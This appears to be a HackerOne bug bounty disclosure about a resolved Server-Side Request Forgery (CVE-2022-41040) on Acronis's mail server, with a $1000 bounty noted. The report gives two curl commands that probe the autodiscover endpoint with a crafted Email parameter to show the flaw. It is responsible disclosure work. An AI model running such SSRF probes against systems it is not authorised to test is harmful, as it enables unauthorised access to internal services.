mail.acronis.com was vulnerable to CVE-2022-41040. After internal investigation, Acronis security team concluded that there are no signs of exploitation of this issue.

Actions:

View on HackerOne

Reported by bbece5b1ea2cbb33d0690ad

Vulnerability Details

Technical details and impact analysis

Server-Side Request Forgery (SSRF)

Hello Acronis team, Please run curl -ksL -m5 -o /dev/null -I -w "%{http_code}" "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" curl -ksL -m5 "https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/[email protected]&Protocol=ActiveSync" | grep Protocol and get following output 404 and {"Protocol":"ActiveSync","Url":"https://eas.outlook.com/Microsoft-Server-ActiveSync"} Proving that mail.acronis.com is vulnerable to CVE-2022-41040 Poc video attached ## Impact SSRF can be used to for unauthorized actions or access to confidential data.

Related CVEs

Associated Common Vulnerabilities and Exposures

CVE-2022-41040 HIGH

No description available

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1000.00

Submitted

Weakness

Server-Side Request Forgery (SSRF)